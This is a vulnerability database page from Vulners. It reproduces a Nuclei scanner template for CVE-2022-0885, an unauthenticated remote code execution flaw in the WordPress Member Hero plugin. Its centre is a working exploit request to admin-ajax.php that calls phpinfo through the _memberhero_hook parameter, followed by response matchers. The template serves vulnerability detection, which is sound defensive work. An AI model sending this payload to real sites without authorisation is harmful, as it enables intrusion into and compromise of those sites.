Vulners
Lucene search
Member Hero <=1.0.9 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2022-0885 | 13 Jun 202213:15 | – | attackerkb |
 | CVE-2022-0885 | 6 Aug 202305:19 | – | circl |
 | WordPress plugin Member Hero 代码注入漏洞 | 13 Jun 202200:00 | – | cnnvd |
 | WordPress Member Hero plugin code injection vulnerability | 15 Jun 202200:00 | – | cnvd |
 | CVE-2022-0885 | 13 Jun 202212:41 | – | cve |
 | CVE-2022-0885 Member Hero <= 1.0.9 - Unauthenticated RCE | 13 Jun 202212:41 | – | cvelist |
 | CVE-2022-0885 | 13 Jun 202213:15 | – | nvd |
 | CVE-2022-0885 | 13 Jun 202213:15 | – | osv |
 | WordPress Member Hero plugin <= 1.0.9 - Unauthenticated Remote Code Execution (RCE) vulnerability | 18 May 202200:00 | – | patchstack |
 | Authorization | 13 Jun 202213:15 | – | prion |
10
id: CVE-2022-0885
info:
name: Member Hero <=1.0.9 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
impact: |
An attacker can execute arbitrary code on the target system, potentially leading to a complete compromise of the WordPress site.
remediation: |
Update to the latest version of the Member Hero plugin (1.0.9 or higher) to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df
- https://wordpress.org/plugins/member-hero/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0885
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0885
cwe-id: CWE-862
epss-score: 0.09105
epss-percentile: 0.94661
cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: memberhero
product: member_hero
framework: wordpress
tags: cve,cve2022,unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,memberhero,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "<!DOCTYPE html"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
part: body
# digest: 4a0a00473045022100acacd481887e097356b76e038663d5f723ba0a695db1a9cc1f214985ca58454f022079617b0b31b45da3749efb66decfa7aa1a101bc08df6b3387576c639a8a82d2c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
CVSS 3.19.8
EPSS0.09105